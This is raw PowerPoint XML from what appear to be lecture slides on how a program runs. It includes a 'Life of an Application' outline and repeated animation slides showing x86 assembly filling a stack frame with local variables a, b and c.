      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909810" y="33279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0xFFF0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Right Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="203872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539497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Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>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0x41273333</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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89</a:t>
            </a:fld>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1953845" y="416179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3910385" y="18801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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556352" y="4872992"/>
          <a:ext cx="3696160" cy="11125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0x41273333</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xFFF0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x10000</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6246558" y="1692435"/>
            <a:ext cx="2897442" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(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$0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>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,-0x4(</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add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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5873526" y="323671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1205950" y="348972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909812" y="221295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0xFFFC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909812" y="25913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0xFFF8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909811" y="297156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0xFFF4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909810" y="33279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0xFFF0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Right Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="203872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094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Life of an Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Author writes code in high-level language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application is translated in some executable form and saved to a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interpretation vs. compilation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application is loaded in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application is executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application terminates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160119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Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>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0x41273333</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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90</a:t>
            </a:fld>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1953845" y="416179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3910385" y="18801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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556352" y="4872992"/>
          <a:ext cx="3696160" cy="11125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0x41273333</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xFFF0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x10000</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6246558" y="1692435"/>
            <a:ext cx="2897442" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(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$0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>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,-0x4(</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add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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5873527" y="350571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1205950" y="348972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909812" y="221295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0xFFFC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909812" y="25913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0xFFF8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909811" y="297156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0xFFF4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909810" y="33279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0xFFF0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2050714"/>
            <a:ext cx="2103019" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2406315"/>
            <a:ext cx="2103019" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357946" y="2779828"/>
            <a:ext cx="2103019" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41762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Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>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0x41273333</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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91</a:t>
            </a:fld>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1953845" y="416179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3910385" y="18801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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556352" y="4872992"/>
          <a:ext cx="3696160" cy="11125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0x64</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xFFF0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x10000</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6246558" y="1692435"/>
            <a:ext cx="2897442" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(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$0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>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,-0x4(</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add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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5873527" y="350571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1205950" y="348972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909812" y="221295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0xFFFC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909812" y="25913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0xFFF8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909811" y="297156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0xFFF4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909810" y="33279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0xFFF0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2050714"/>
            <a:ext cx="2103019" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2406315"/>
            <a:ext cx="2103019" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357946" y="2779828"/>
            <a:ext cx="2103019" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Right Arrow 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="205159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722129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Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>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0x41273333</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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92</a:t>
            </a:fld>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1953845" y="416179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3910385" y="18801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0x10000</a:t>
            </a:r>
